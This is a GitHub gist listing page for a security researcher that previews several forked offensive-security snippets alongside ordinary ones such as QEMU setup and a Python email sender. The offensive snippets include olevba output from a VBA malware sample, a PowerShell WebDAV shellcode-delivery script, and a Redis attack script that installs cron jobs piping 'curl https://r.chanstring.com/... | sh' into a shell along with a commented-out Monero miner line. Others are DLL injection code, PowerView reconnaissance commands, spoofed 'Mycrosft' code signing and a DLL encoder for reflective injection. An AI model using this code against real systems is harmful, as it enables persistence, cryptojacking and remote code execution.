Skip to content

Instantly share code, notes, and snippets.

View carnal0wnage's full-sized avatar

Chris Gates carnal0wnage

917 followers · 127 following
View GitHub Profile
@carnal0wnage
carnal0wnage / malware.txt
Created February 1, 2018 01:04 — forked from JohnLaTwC/malware.txt
[VBA malware uploaded by @JohnLaTwC
## uploaded by @JohnLaTwC
## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
===============================================================================
FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
Type: MHTML
-------------------------------------------------------------------------------
@carnal0wnage
carnal0wnage / Invoke-WebDavDelivery.ps1
Created September 8, 2017 02:25
Payload delivery using WebDAV PROPFIND only covert channel
function Invoke-WebDavDelivery
{
<#
.SYNOPSIS
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it.
This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x
@carnal0wnage
carnal0wnage / windows10qemu.sh
Created April 3, 2017 19:18 — forked from Manouchehri/windows10qemu.sh
Running Windows 10 in a UEFI enabled QEMU environment with KVM.
# Installing
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
@carnal0wnage
carnal0wnage / redis-noauth-lady-hack.sh
Created January 4, 2017 00:35 — forked from lokielse/redis-noauth-lady-hack.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
@carnal0wnage
carnal0wnage / python_email.py
Created June 21, 2016 16:47 — forked from srv89/python_email.py
Python code for sending HTML email (Attachment + Multiple Recipients )
__author__ = 'srv'
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
username = '' # Email Address from the email you want to send an email
password = '' # Password
server = smtplib.SMTP('')
@carnal0wnage
carnal0wnage / 00readme.md
Created June 4, 2016 03:34 — forked from indrora/00readme.md
DeadUpdate: Kickin' it bigtime. 
                             From the vendor that brought you a
                        vulnerable cloud storage platform comes
                        
           ___              ____  __        __     __ 
          / _ \___ ___ ____/ / / / /__  ___/ /__ _/ /____ 
         / // / -_) _ `/ _  / /_/ / _ \/ _  / _ `/ __/ -_)
        /____/\__/\_,_/\_,_/\____/ .__/\_,_/\_,_/\__/\__/ 
         Because popping SYSTEM /_/ is easy when you trust HTTP

Or, "How I learned to stop worrying and

@carnal0wnage
carnal0wnage / dll_injection.py
Created May 22, 2016 02:03 — forked from RobinDavid/dll_injection.py
Sample ddl injection (Gray Hat Python)
import sys
from ctypes import *
PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32 #Get the wanted dll
pid = sys.argv[1] #Gather sent parameters
@carnal0wnage
carnal0wnage / PowerView-2.0-tricks.ps1
Created March 19, 2016 22:26 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
@carnal0wnage
carnal0wnage / signer.ps1
Created October 27, 2015 08:56
Create a Self-Signed Executable - Without Makecert.exe
function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
$CAsubject = $certSubject
$dn = new-object -com 'X509Enrollment.CX500DistinguishedName'
$dn.Encode( 'CN=' + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
#Issuer Property for cleanup
$issuer = 'Mycrosft'
$issuerdn = new-object -com 'X509Enrollment.CX500DistinguishedName'
$issuerdn.Encode('CN=' + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
# Create a new Private Key
@carnal0wnage
carnal0wnage / DllByteEncode.ps1
Last active September 18, 2017 16:17 — forked from sixdub/DllByteEncode.ps1
function Invoke-DllByteEncode
{
#Encoder used to take a dll and turn it into a base64 encoded byte array for Powersploit's
#Invoke-ReflectivePEInjection
Param(
[Parameter(Position = 0)]
[String]
$InputPath,
[Parameter(Position = 1)]
[String]